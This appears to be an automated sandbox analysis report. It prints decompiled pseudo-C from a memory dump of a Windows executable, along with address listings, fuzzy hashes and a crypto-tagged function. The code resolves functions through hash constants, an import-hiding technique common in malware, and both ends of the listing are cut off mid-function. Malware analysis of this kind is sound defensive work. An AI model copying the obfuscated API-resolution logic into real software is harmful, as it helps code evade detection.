																	_t537 = _t537 + 0x18;
																	__eflags = _t554 - 0x10;
																	if(_t554 < 0x10) {
																		continue;
																	} else {
																		goto L33;
																	}
																	goto L162;
																}
																_t553 =  *(_t537 + _t558 + 0x14);
																__eflags = _t553;
																if(_t553 != 0) {
																	L37:
																	__eflags = _t553;
																	if(_t553 == 0) {
																		L57:
																		E00418CA0( &(_t573[0x22]));
																		E00418CA0( &(_t573[0x20]));
																		E00429510( &(_t573[0x24]));
																		E00418CA0( &(_t573[0x1c]));
																		__eflags = _t573[0x1b];
																		if(_t573[0x1b] != 0) {
																			_t537 = _t573[0x1a];
																			__eflags = _t537;
																			if(_t537 == 0) {
																				L61:
																				_t325 = 1;
																			} else {
																				__eflags = _t537 - 0xffffffff;
																				if(_t537 == 0xffffffff) {
																					goto L61;
																				} else {
																					_t325 = 0;
																				}
																			}
																			__eflags = _t325;
																			if(_t325 == 0) {
																				E0042BF00(_t537);
																			}
																		}
																		goto L64;
																	} else {
																		_t537 =  &(_t573[0x32]);
																		_t558 =  &(_t573[0x31]);
																		_t330 =  *_t553(0, _t573[7], _t573[0x24],  &(_t573[0x31]), _t573[0x24],  &(_t573[0x32]),  &(_t573[0x2f]));
																		__eflags = _t330;
																		if(_t330 == 0) {
																			_t558 =  *0x43b1f4; // 0x2491340
																			__eflags = _t558 - 0xc139578;
																			if(_t558 == 0xc139578) {
																				 *0x43b1f4 = 0;
																				goto L125;
																			} else {
																				__eflags = _t558;
																				if(_t558 == 0) {
																					L125:
																					_push(0xa1310f65);
																					 *_t573 = E00417564(0xa1310f65);
																					__eflags =  *_t573;
																					if( *_t573 == 0) {
																						_t333 = E00416C50(0xa1310f65);
																						__eflags = _t333;
																						if(_t333 != 0) {
																							_push(0xa1310f65);
																							 *_t573 = E00417564(0xa1310f65);
																						}
																					}
																					__eflags =  *_t573;
																					if( *_t573 == 0) {
																						goto L39;
																					} else {
																						_t573 =  &(_t573[0xfffffffffffffffe]);
																						_t537 = 0xea5f6acc;
																						_t371 = E004167C8(_t573[2], 0xea5f6acc);
																						goto L128;
																					}
																				} else {
																					__eflags = 0;
																					do {
																						_t556 = 0;
																						_t537 = 0;
																						while(1) {
																							__eflags =  *((intOrPtr*)(_t537 + _t558 + 8)) - 0xea5f6acc;
																							if( *((intOrPtr*)(_t537 + _t558 + 8)) == 0xea5f6acc) {
																								break;
																							}
																							_t556 = _t556 + 1;
																							_t537 = _t537 + 0x18;
																							__eflags = _t556 - 0x10;
																							if(_t556 < 0x10) {
																								continue;
																							} else {
																								goto L124;
																							}
																							goto L162;
																						}
																						_t371 =  *(_t537 + _t558 + 0x14);
																						__eflags = _t371;
																						if(_t371 != 0) {
																							L128:
																							__eflags = _t371;
																							if(_t371 == 0) {
																								goto L39;
																							} else {
																								asm("int3");
																								return _t371;
																							}
																						} else {
																							goto L125;
																						}
																						goto L162;
																						L124:
																						asm("o16 nop [eax+eax]");
																						_t195 = _t558 + 0x180; // 0x2498fa8
																						_t558 =  *_t195;
																						__eflags = _t558;
																					} while (_t558 != 0);
																					goto L125;
																				}
																			}
																		} else {
																			L39:
																			__eflags = _t573[0x2f] - 1;
																			if(_t573[0x2f] != 1) {
																				E00418CA0( &(_t573[0x22]));
																				E00418CA0( &(_t573[0x20]));
																				E00429510( &(_t573[0x24]));
																				E00418CA0( &(_t573[0x1c]));
																				__eflags = _t573[0x1b];
																				if(_t573[0x1b] != 0) {
																					_t537 = _t573[0x1a];
																					__eflags = _t537;
																					if(_t537 == 0) {
																						L54:
																						_t338 = 1;
																					} else {
																						__eflags = _t537 - 0xffffffff;
																						if(_t537 == 0xffffffff) {
																							goto L54;
																						} else {
																							_t338 = 0;
																						}
																					}
																					__eflags = _t338;
																					if(_t338 == 0) {
																						E0042BF00(_t537);
																					}
																				}
																			} else {
																				_push(0x48);
																				_t555 = E00411030();
																				_t575 =  &(_t573[1]);
																				__eflags = _t555;
																				if(_t555 == 0) {
																					_t555 = 0;
																					__eflags = 0;
																				} else {
																					_t87 = _t555 + 0x14; // 0x14
																					 *((intOrPtr*)(_t555 + 4)) = 0;
																					 *_t555 = 0x43a190;
																					E00418810(_t87, 0);
																					_t89 = _t555 + 0x1c; // 0x1c
																					E00418810(_t89, 0);
																					_t90 = _t555 + 0x24; // 0x24
																					E00418810(_t90, 0);
																					_t91 = _t555 + 0x2c; // 0x2c
																					E00418810(_t91, 0);
																					_t92 = _t555 + 0x34; // 0x34
																					E00418810(_t92, 0);
																				}
																				_t94 = _t555 + 8; // 0x8
																				E00410C10(_t94, _t575[3], 0xc);
																				_t573 =  &(_t575[3]);
																				_t96 = _t555 + 0x14; // 0x14
																				E00418CC0(_t96, _t573[0x20]);
																				_t98 = _t555 + 0x1c; // 0x1c
																				E00418CC0(_t98, _t573[0x22]);
																				_t100 = _t555 + 0x24; // 0x24
																				E00420220(E004196D0(E00420220(_t100, _t573[0x23], 0), 0x5c), _t573[0x21], 0);
																				_t558 =  &(_t573[0xe]);
																				E0042C580( &(_t573[0x1b]), _t94,  &(_t573[0xe]), 0xf1c53a0c);
																				E0042CAE0( &(_t573[0x1b]),  &(_t573[0x10]), _t573[0xe]);
																				E00420B10( &(_t573[0xe]));
																				_t108 = _t555 + 0x2c; // 0x2c
																				E004196D0(E00420220(_t108, _t573[0x11], 0), 0x5c);
																				E00418CA0( &(_t573[0x10]));
																				E00425C90(_t411,  &(_t573[0x12]));
																				_t112 = _t555 + 0x34; // 0x34
																				E00418CC0(_t112, _t573[0x12]);
																				E00418CA0( &(_t573[0x12]));
																				_push(0);
																				_push(0);
																				__eflags = E004200B0(0,  *((intOrPtr*)(_t555 + 0x2c)), _t573[0x2a], _t555) - 1;
																				_push(0xffffffff);
																				_push(_t555);
																				 *((char*)(_t555 + 0x3c)) = 0;
																				_t537 = 0 | __eflags > 0x00000000;
																				 *((char*)(_t555 + 0x44)) = __eflags > 0;
																				 *((intOrPtr*)(_t555 + 0x40)) = 0xffffffff;
																				E00432A00(_t573[5]);
																				E00418CA0( &(_t573[0x22]));
																				E00418CA0( &(_t573[0x20]));
																				E00429510( &(_t573[0x24]));
																				E00418CA0( &(_t573[0x1c]));
																				__eflags = _t573[0x1b];
																				if(_t573[0x1b] != 0) {
																					_t537 = _t573[0x1a];
																					__eflags = _t537;
																					if(_t537 == 0) {
																						L47:
																						_t363 = 1;
																					} else {
																						__eflags = _t537 - 0xffffffff;
																						if(_t537 == 0xffffffff) {
																							goto L47;
																						} else {
																							_t363 = 0;
																						}
																					}
																					__eflags = _t363;
																					if(_t363 == 0) {
																						E0042BF00(_t537);
																					}
																				}
																			}
																			goto L64;
																		}
																	}
																} else {
																	goto L34;
																}
																goto L162;
																L33:
																asm("o16 nop [eax+eax]");
																_t75 = _t558 + 0x180; // 0x2498fa8
																_t558 =  *_t75;
																__eflags = _t558;
															} while (_t558 != 0);
															goto L34;
														}
													}
												} else {
													E00429510( &(_t573[0x24]));
													E00418CA0( &(_t573[0x1c]));
													__eflags = _t573[0x1b];
													if(_t573[0x1b] != 0) {
														_t537 = _t573[0x1a];
														__eflags = _t537;
														if(_t537 == 0) {
															L24:
															_t380 = 1;
														} else {
															__eflags = _t537 - 0xffffffff;
															if(_t537 == 0xffffffff) {
																goto L24;
															} else {
																_t380 = 0;
															}
														}
														__eflags = _t380;
														if(_t380 == 0) {
															E0042BF00(_t537);
														}
													}
													goto L64;
												}
												goto L162;
												L64:
												_t573[0x1a] = 0;
												_t571 = _t571 + 1;
												__eflags = _t571 - _t573[0x2a];
											} while (_t571 < _t573[0x2a]);
											_t551 = _t573[3];
											goto L66;
										}
										goto L162;
									}
									_t551 = _t573[3];
									E00418810( &(_t573[0x29]), 0);
									goto L17;
								} else {
									asm("int3");
									return _t398;
								}
							} else {
								goto L6;
							}
							goto L162;
							L5:
							asm("o16 nop [eax+eax]");
							_t27 = _t521 + 0x180; // 0x2498fa8
							_t521 =  *_t27;
						} while (_t521 != 0);
						goto L6;
					}
				}
				L162:
			}

0x00415b60
0x00415b60
0x00415b61
0x00415b62
0x00415b63
0x00415b64
0x00415b6a
0x00415b6c
0x00415b75
0x00415b77
0x00415b7c
0x00415b82
0x00415b98
0x00415bb3
0x00415bca
0x00415be5
0x00415bfc
0x00415c17
0x00415c2e
0x00415c49
0x00415c60
0x00415c76
0x00415c7b
0x00415c82
0x00415c91
0x00415c96
0x00415ca2
0x004167ae
0x00000000
0x00415ca8
0x00415caa
0x00415cd7
0x00415cdc
0x00415ce2
0x00415ce6
0x0041677e
0x00416783
0x00416785
0x00416790
0x00416796
0x00416796
0x00416785
0x00415cee
0x00000000
0x00415cf0
0x00415cf7
0x00415cfa
0x00000000
0x00415cfa
0x00415cac
0x00415cac
0x00415cac
0x00415cae
0x00415cb0
0x00415cbe
0x00415cbf
0x00415cc5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00415cc5
0x0041679d
0x004167a1
0x004167a3
0x00415cff
0x00415d01
0x00415d09
0x00415d09
0x00415d09
0x00415d0b
0x00415d0f
0x00415d13
0x00415d15
0x00000000
0x00000000
0x00415d25
0x00415d36
0x00415d3b
0x00415d4c
0x00415d50
0x00415d5f
0x00415d72
0x00415d8e
0x00415d9c
0x00415da3
0x00415da8
0x00415dae
0x00415db4
0x00415dce
0x00415de3
0x00415dea
0x00415df6
0x00415db6
0x00415db8
0x00415dc4
0x00000000
0x00415dc4
0x00415dfb
0x00415e04
0x00415e15
0x00415e1a
0x00415e22
0x00416266
0x00416266
0x0041626f
0x0041627f
0x00416281
0x00416287
0x00416292
0x00416298
0x004166e8
0x00000000
0x0041629e
0x0041629e
0x004162a0
0x004162cd
0x004162d2
0x004162d8
0x004162da
0x004162dc
0x004166b8
0x004166bd
0x004166bf
0x004166ca
0x004166d0
0x004166d0
0x004166bf
0x004162e2
0x004162e4
0x004162f1
0x004162f9
0x00000000
0x004162f9
0x004162a2
0x004162a2
0x004162a2
0x004162a4
0x004162a4
0x004162a6
0x004162a6
0x004162ae
0x00000000
0x00000000
0x004162b4
0x004162b5
0x004162b8
0x004162bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004162bb
0x004166d7
0x004166db
0x004166dd
0x004162fb
0x004162fb
0x004162fd
0x00416315
0x00416317
0x00416319
0x0041631f
0x00416327
0x0041632f
0x00416335
0x0041633c
0x00416342
0x00416349
0x00416349
0x0041634b
0x00416352
0x00416354
0x0041635e
0x00416363
0x00416366
0x0041636c
0x00416372
0x004166a4
0x00000000
0x00416378
0x00416378
0x0041637a
0x004163a9
0x004163ae
0x004163b4
0x004163b6
0x004163b8
0x0041666e
0x00416671
0x00416676
0x00416679
0x0041667b
0x00416686
0x0041668c
0x0041668c
0x0041667b
0x004163be
0x004163c0
0x004163c9
0x004163d1
0x00000000
0x004163d1
0x0041637c
0x0041637c
0x0041637e
0x0041637e
0x00416380
0x00416382
0x00416382
0x0041638a
0x00000000
0x00000000
0x00416390
0x00416391
0x00416394
0x00416397
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00416397
0x00416693
0x00416697
0x00416699
0x004163d3
0x004163d3
0x004163d5
0x004163db
0x004163fd
0x004163fd
0x00000000
0x0041669f
0x00000000
0x0041669f
0x00000000
0x00416399
0x00416399
0x0041639f
0x0041639f
0x004163a5
0x004163a5
0x00000000
0x0041637e
0x0041637a
0x004163ff
0x004163ff
0x00416406
0x0041640d
0x0041640f
0x00416411
0x00416415
0x00416417
0x00416419
0x0041641d
0x00416421
0x00416423
0x0041642b
0x0041642d
0x0041642e
0x00416439
0x0041643e
0x00416440
0x00000000
0x00416442
0x00416442
0x00416443
0x0041644e
0x00416453
0x00416455
0x00416605
0x00416607
0x0041660b
0x00416612
0x00416616
0x0041661a
0x0041661d
0x00000000
0x00000000
0x00000000
0x00416455
0x00000000
0x0041645b
0x0041645b
0x0041645c
0x0041645c
0x00416461
0x00416465
0x00416465
0x00416415
0x00416469
0x00416469
0x0041646a
0x0041646d
0x0041646d
0x00416354
0x00416327
0x00416319
0x004166e3
0x00000000
0x004166e3
0x00000000
0x004162bd
0x004162bd
0x004162c3
0x004162c3
0x004162c9
0x004162c9
0x00000000
0x004162a2
0x004162a0
0x0041647a
0x0041647a
0x00416480
0x00416486
0x0041665a
0x00000000
0x0041648c
0x0041648c
0x0041648e
0x004164bb
0x004164c0
0x004164c6
0x004164c8
0x004164ca
0x0041662a
0x0041662f
0x00416631
0x0041663c
0x00416642
0x00416642
0x00416631
0x004164d0
0x004164d2
0x00000000
0x004164d4
0x004164db
0x004164de
0x00000000
0x004164de
0x00416490
0x00416490
0x00416490
0x00416492
0x00416492
0x00416494
0x00416494
0x0041649c
0x00000000
0x00000000
0x004164a2
0x004164a3
0x004164a6
0x004164a9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004164a9
0x00416649
0x0041664d
0x0041664f
0x004164e3
0x004164e3
0x004164e5
0x004164f0
0x004164f4
0x00416500
0x0041650c
0x00416515
0x0041651a
0x0041651f
0x00416521
0x00416525
0x00416527
0x00416532
0x00416532
0x00416529
0x00416529
0x0041652c
0x00000000
0x0041652e
0x0041652e
0x0041652e
0x0041652c
0x00416537
0x00416539
0x0041653c
0x0041653c
0x00416539
0x00416541
0x0041654d
0x00416565
0x004164e7
0x004164e7
0x004164ee
0x004164ef
0x004164ef
0x00416655
0x00000000
0x00416655
0x00000000
0x004164ab
0x004164ab
0x004164b1
0x004164b1
0x004164b7
0x004164b7
0x00000000
0x00416490
0x0041648e
0x00415e28
0x00415e28
0x00415e28
0x00415e2a
0x00415e2e
0x00415e35
0x00415e42
0x00415e44
0x00415e46
0x00415e50
0x00415e66
0x00415e6b
0x00415e7e
0x00415e8a
0x00415e96
0x00415e9b
0x00415e9d
0x00415ef6
0x00415eff
0x00415f06
0x00415f15
0x00415f28
0x00415f2d
0x00415f33
0x00415f39
0x00416753
0x00000000
0x00415f3f
0x00415f3f
0x00415f41
0x00415f70
0x00415f75
0x00415f7b
0x00415f7f
0x00415f84
0x00416721
0x00416726
0x00416728
0x00416733
0x00416739
0x00416739
0x00416728
0x00415f8a
0x00415f8f
0x00000000
0x00415f95
0x00415f95
0x00415f98
0x00415fa6
0x00000000
0x00415fa6
0x00415f43
0x00415f43
0x00415f45
0x00415f45
0x00415f47
0x00415f49
0x00415f49
0x00415f51
0x00000000
0x00000000
0x00415f57
0x00415f58
0x00415f5b
0x00415f5e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00415f5e
0x00416742
0x00416746
0x00416748
0x00415fa8
0x00415fa8
0x00415faa
0x004161f8
0x004161ff
0x0041620b
0x00416217
0x00416220
0x00416225
0x0041622a
0x0041622c
0x00416230
0x00416232
0x0041623d
0x0041623d
0x00416234
0x00416234
0x00416237
0x00000000
0x00416239
0x00416239
0x00416239
0x00416237
0x00416242
0x00416244
0x00416247
0x00416247
0x00416244
0x00000000
0x00415fb0
0x00415fb7
0x00415fbe
0x00415fdc
0x00415fde
0x00415fe0
0x00416566
0x0041656c
0x00416572
0x004165f9
0x00000000
0x00416578
0x00416578
0x0041657a
0x004165a5
0x004165aa
0x004165b0
0x004165b3
0x004165b7
0x004166fc
0x00416701
0x00416703
0x0041670e
0x00416714
0x00416714
0x00416703
0x004165bd
0x004165c1
0x00000000
0x004165c7
0x004165c7
0x004165ca
0x004165d3
0x00000000
0x004165d3
0x0041657c
0x0041657c
0x0041657e
0x0041657e
0x00416580
0x00416582
0x00416582
0x0041658a
0x00000000
0x00000000
0x0041658c
0x0041658d
0x00416590
0x00416593
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00416593
0x004165ef
0x004165f3
0x004165f5
0x004165d8
0x004165d8
0x004165da
0x00000000
0x004165e0
0x004165e0
0x004165e1
0x004165e1
0x004165f7
0x00000000
0x004165f7
0x00000000
0x00416595
0x00416595
0x0041659b
0x0041659b
0x004165a1
0x004165a1
0x00000000
0x0041657e
0x0041657a
0x00415fe6
0x00415fe6
0x00415fe6
0x00415fee
0x004161a9
0x004161b5
0x004161c1
0x004161ca
0x004161cf
0x004161d4
0x004161d6
0x004161da
0x004161dc
0x004161e7
0x004161e7
0x004161de
0x004161de
0x004161e1
0x00000000
0x004161e3
0x004161e3
0x004161e3
0x004161e1
0x004161ec
0x004161ee
0x004161f1
0x004161f1
0x004161ee
0x00415ff4
0x00415ff4
0x00415ffb
0x00415ffd
0x00416000
0x00416002
0x00416044
0x00416044
0x00416004
0x00416006
0x0041600a
0x0041600d
0x00416013
0x0041601a
0x0041601d
0x00416024
0x00416027
0x0041602e
0x00416031
0x00416038
0x0041603b
0x0041603b
0x0041604c
0x00416050
0x00416055
0x0041605f
0x00416062
0x0041606e
0x00416071
0x0041607f
0x0041609b
0x004160a0
0x004160ae
0x004160c0
0x004160c7
0x004160d2
0x004160de
0x004160e7
0x004160f3
0x004160fc
0x004160ff
0x00416108
0x0041610f
0x00416110
0x00416127
0x0041612a
0x0041612b
0x0041612c
0x0041612f
0x00416136
0x00416139
0x0041613c
0x00416148
0x00416154
0x00416160
0x00416169
0x0041616e
0x00416173
0x00416179
0x0041617d
0x0041617f
0x0041618a
0x0041618a
0x00416181
0x00416181
0x00416184
0x00000000
0x00416186
0x00416186
0x00416186
0x00416184
0x0041618f
0x00416191
0x00416198
0x00416198
0x00416191
0x00416173
0x00000000
0x00415fee
0x00415fe0
0x0041674e
0x00000000
0x0041674e
0x00000000
0x00415f60
0x00415f60
0x00415f66
0x00415f66
0x00415f6c
0x00415f6c
0x00000000
0x00415f45
0x00415f41
0x00415e9f
0x00415ea6
0x00415eaf
0x00415eb4
0x00415eb9
0x00415ebf
0x00415ec3
0x00415ec5
0x00415ed0
0x00415ed0
0x00415ec7
0x00415ec7
0x00415eca
0x00000000
0x00415ecc
0x00415ecc
0x00415ecc
0x00415eca
0x00415ed5
0x00415ed7
0x00415ede
0x00415ede
0x00415ed7
0x00000000
0x00415eb9
0x00000000
0x0041624c
0x0041624c
0x00416254
0x00416255
0x00416255
0x00416262
0x00000000
0x00416262
0x00000000
0x00415e22
0x00416762
0x0041676f
0x00000000
0x00415d03
0x00415d03
0x00415d04
0x00415d04
0x004167a9
0x00000000
0x004167a9
0x00000000
0x00415cc7
0x00415cc7
0x00415ccd
0x00415ccd
0x00415cd3
0x00000000
0x00415cac
0x00415caa
0x00000000

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ced1bca1e82ba80c9dd0faf688f7514a9fbe4b3f1dc4b56420de54e12c2bdd3
Instruction ID: d2cba2707c30d605d6b587d79c183e98a3869310ad282f93d58cb3cfed0ad00e
Opcode Fuzzy Hash: 2ced1bca1e82ba80c9dd0faf688f7514a9fbe4b3f1dc4b56420de54e12c2bdd3
Instruction Fuzzy Hash: 9052F4312043019BD724EF25D881BEF73E5AF80348F55892FA45987292EF38DD85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00427FC0, Relevance: .7, Instructions: 711
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00427FC0(intOrPtr* __ecx, signed int* _a4, char _a8) {
				signed int _v32;
				signed int _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t183;
				signed int _t186;
				signed int* _t187;
				signed int* _t196;
				signed int _t197;
				signed int _t199;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				intOrPtr* _t204;
				signed int _t206;
				signed int _t207;
				signed int _t210;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t228;
				signed int _t230;
				signed int _t231;
				signed int _t237;
				signed int _t240;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t253;
				signed int _t258;
				signed int* _t259;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t271;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				intOrPtr _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int* _t291;
				signed int _t295;
				signed int* _t297;
				char _t298;
				char _t299;
				signed int _t301;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t307;
				void* _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t315;
				signed int _t317;
				void* _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t326;
				intOrPtr* _t329;
				intOrPtr* _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				intOrPtr* _t335;
				void* _t336;
				signed int _t337;
				unsigned int _t344;
				signed int _t346;
				void* _t347;
				signed int _t348;
				intOrPtr _t349;
				unsigned int _t354;
				signed int _t356;
				unsigned int _t361;
				signed int _t363;
				unsigned int _t368;
				intOrPtr* _t372;
				signed int _t373;
				signed int _t380;
				signed int _t382;
				signed int _t388;
				signed int _t394;
				signed int _t395;
				signed int _t397;
				void* _t399;
				void* _t401;

				_t399 = (_t397 & 0xfffffff0) - 0x34;
				_t372 = __ecx;
				_t280 =  *__ecx;
				if(_t280 != 0) {
					_t301 =  *( *( *(__ecx + 4)));
					__eflags = _t301;
					if(_t301 == 0) {
						L35:
						_push(0x40);
						_t262 = E00411030();
						_t399 = _t399 + 4;
						__eflags =  *_t372 - 1;
						 *_t262 = 0;
						if( *_t372 <= 1) {
							goto L45;
						} else {
							_t348 = 0x40;
							goto L37;
						}
					} else {
						__eflags =  *_t301;
						if( *_t301 == 0) {
							goto L35;
						} else {
							_t240 = _t301 & 0x0000000f;
							__eflags = _t240;
							if(_t240 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t271 =  ~( ~_t240 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								__eflags = _t271;
								_v64 = _t271;
								_t363 = _t271;
								while(1) {
									asm("movdqu xmm1, [edx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t271;
									if(_t271 != 0) {
										break;
									}
									_t240 = _t240 + 0x10;
									__eflags = _t240 - _t363;
									if(_t240 < _t363) {
										continue;
									} else {
										_v64 = _t363;
										__eflags = _v64 - 0x7fffffff;
										if(_v64 >= 0x7fffffff) {
											L23:
											_v64 = 0x7fffffff;
										} else {
											_t253 = _t363;
											while(1) {
												__eflags =  *((char*)(_t253 + _t301));
												if( *((char*)(_t253 + _t301)) == 0) {
													break;
												}
												_t253 = _t253 + 1;
												__eflags = _t253 - 0x7fffffff;
												if(_t253 < 0x7fffffff) {
													continue;
												} else {
													goto L23;
												}
												goto L24;
											}
											_v64 = _t253;
										}
									}
									goto L24;
								}
								asm("bsf ebx, ebx");
								_v64 = _t271 + _t240;
							} else {
								_v64 = 0;
								_t276 = _v64;
								_t240 =  ~_t240 + 0x10;
								__eflags = _t240;
								while(1) {
									__eflags =  *((char*)(_t276 + _t301));
									if( *((char*)(_t276 + _t301)) == 0) {
										break;
									}
									_t276 = _t276 + 1;
									__eflags = _t276 - _t240;
									if(_t276 < _t240) {
										continue;
									} else {
										goto L16;
									}
									goto L24;
								}
								_v64 = _t276;
							}
							L24:
							_t242 = _v64 + 1;
							__eflags = _t242 - 0x40;
							_t243 =  <=  ? 0x40 : _t242;
							__eflags = _t243;
							if(_t243 > 0) {
								_t368 = (_t243 >> 5 >> 0x1a) + _t243 >> 6;
								_t244 = _t243 & 0x8000003f;
								__eflags = _t244;
								if(_t244 < 0) {
									_t244 = (_t244 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t244;
								}
								__eflags = _t244;
								_t348 = _t368 + (0 | _t244 > 0x00000000) << 6;
								_push(_t348);
								_v68 = _t301;
								_t247 = E00411030();
								_t334 = _v68;
								_t297 = _t247;
								_t399 = _t399 + 4;
								_v60 = 0;
								_v48 = _t297;
								_v40 = _t372;
								 *_t297 = 0;
								_v68 =  *_t372;
								_t275 = _v60;
								_t395 = _v64;
								while(1) {
									_t249 =  *_t334;
									_t275 = _t275 + 1;
									 *_t297 = _t249;
									__eflags = _t395;
									if(_t395 == 0) {
										goto L33;
									}
									__eflags = _t275 - _t395;
									if(_t275 == _t395) {
										_t262 = _v48;
										_t250 = _v68;
										_t372 = _v40;
										_t297[0] = 0;
									} else {
										goto L33;
									}
									L173:
									__eflags = _t250 - 1;
									if(_t250 > 1) {
										goto L37;
									} else {
										goto L174;
									}
									goto L88;
									L33:
									__eflags = _t249;
									if(_t249 == 0) {
										_t262 = _v48;
										_t250 = _v68;
										_t372 = _v40;
									} else {
										_t297 =  &(_t297[0]);
										_t334 = _t334 + 1;
										__eflags = _t334;
										continue;
									}
									goto L173;
								}
							} else {
								_t262 = 0;
								__eflags = _t280 - 1;
								if(_t280 <= 1) {
									L45:
									_t302 = _a4;
									_t183 = 0;
									 *_t302 = 0;
									 *((intOrPtr*)(_t302 + 4)) = 0;
									__eflags = _t262;
									if(_t262 == 0) {
										goto L79;
									} else {
										goto L46;
									}
								} else {
									_t348 = 0;
									L37:
									_t203 = _a8;
									_t315 = 1;
									asm("pxor xmm0, xmm0");
									do {
										__eflags = _t203;
										if(_t203 == 0) {
											_v36 = _t315;
											_v40 = _t372;
										} else {
											__eflags = _t262;
											if(_t262 == 0) {
												_v36 = _t315;
												_v40 = _t372;
												L180:
												_t382 = 0;
											} else {
												_v36 = _t315;
												_v40 = _t372;
												L147:
												_t326 = _t262 & 0x0000000f;
												__eflags = _t326;
												if(_t326 == 0) {
													L151:
													asm("pxor xmm1, xmm1");
													_t388 =  ~( ~_t326 + 0x0000000f & 0x0000000f) + 0x7fffffff;
													__eflags = _t388;
													while(1) {
														asm("movdqu xmm0, [ebx+edx]");
														asm("pcmpeqb xmm0, xmm1");
														asm("pmovmskb eax, xmm0");
														__eflags = _t203;
														if(_t203 != 0) {
															break;
														}
														_t326 = _t326 + 0x10;
														__eflags = _t326 - _t388;
														if(_t326 < _t388) {
															continue;
														} else {
															__eflags = _t388 - 0x7fffffff;
															if(_t388 >= 0x7fffffff) {
																L157:
																_t382 = 0x7fffffff;
															} else {
																while(1) {
																	__eflags =  *((char*)(_t388 + _t262));
																	if( *((char*)(_t388 + _t262)) == 0) {
																		goto L188;
																	}
																	_t388 = _t388 + 1;
																	__eflags = _t388 - 0x7fffffff;
																	if(_t388 < 0x7fffffff) {
																		continue;
																	} else {
																		goto L157;
																	}
																	goto L158;
																}
																goto L188;
															}
														}
														goto L158;
													}
													asm("bsf esi, eax");
													_t382 = _t388 + _t326;
													goto L188;
												} else {
													_t382 = 0;
													_t326 =  ~_t326 + 0x10;
													__eflags = _t326;
													while(1) {
														__eflags =  *((char*)(_t382 + _t262));
														if( *((char*)(_t382 + _t262)) == 0) {
															break;
														}
														_t382 = _t382 + 1;
														__eflags = _t382 - _t326;
														if(_t382 < _t326) {
															continue;
														} else {
															goto L151;
														}
														goto L158;
													}
													L188:
													__eflags = _t382 - 0xfffffffe;
													if(_t382 == 0xfffffffe) {
														 *_t262 = 0;
													}
												}
											}
											L158:
											_t138 = _t382 + 2; // -2147483660
											_t319 = _t138;
											__eflags = _t319 - 0x40;
											_t320 =  <=  ? 0x40 : _t319;
											__eflags = _t348 - _t320;
											if(_t348 < _t320) {
												_t361 = (_t320 >> 5 >> 0x1a) + _t320 >> 6;
												_t321 = _t320 & 0x8000003f;
												__eflags = _t321;
												if(_t321 < 0) {
													_t321 = (_t321 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t321;
												}
												__eflags = _t321;
												_t348 = _t361 + (0 | _t321 > 0x00000000) << 6;
												_push(_t348);
												_t322 = E00411030();
												_t399 = _t399 + 4;
												__eflags = _t262;
												if(_t262 == 0) {
													 *_t322 = 0;
												} else {
													__eflags = _t322;
													if(_t322 != 0) {
														_t219 =  *_t262;
														 *_t322 = _t219;
														__eflags = _t219;
														if(_t219 != 0) {
															_v64 = _t382;
															_t220 = 0;
															__eflags = 0;
															_v32 = _t348;
															while(1) {
																_t220 = _t220 + 1;
																_t285 =  *((char*)(_t262 + _t220 * 2 - 1));
																 *(_t322 + _t220 * 2 - 1) = _t285;
																__eflags = _t285;
																if(_t285 == 0) {
																	break;
																}
																_t286 =  *((char*)(_t262 + _t220 * 2));
																 *(_t322 + _t220 * 2) = _t286;
																__eflags = _t286;
																if(_t286 != 0) {
																	continue;
																}
																break;
															}
															_t382 = _v64;
															_t348 = _v32;
														}
													}
													_push(1);
													_push(_t262);
													_v60 = _t322;
													E004110B0();
													_t322 = _v60;
													_t399 = _t399 + 8;
												}
												_t262 = _t322;
											}
											 *((char*)(_t382 + _t262)) = _a8;
											 *((char*)(_t382 + _t262 + 1)) = 0;
											while(1) {
												L42:
												_t204 = _v40;
												_t284 = _v36;
												_t317 =  *( *( *((intOrPtr*)(_t204 + 4)) + _t284 * 4));
												__eflags = _t317;
												if(_t317 == 0) {
													goto L44;
												}
												__eflags =  *_t317;
												if( *_t317 != 0) {
													__eflags = _t317 - _t262;
													if(_t317 == _t262) {
														goto L44;
													} else {
														_t206 = _t317 & 0x0000000f;
														__eflags = _t206;
														if(_t206 == 0) {
															L94:
															asm("pxor xmm1, xmm1");
															_t394 =  ~( ~_t206 + 0x0000000f & 0x0000000f) + 0x7fffffff;
															__eflags = _t394;
															while(1) {
																asm("movdqu xmm0, [edx+eax]");
																asm("pcmpeqb xmm0, xmm1");
																asm("pmovmskb ecx, xmm0");
																__eflags = _t284;
																if(_t284 != 0) {
																	break;
																}
																_t206 = _t206 + 0x10;
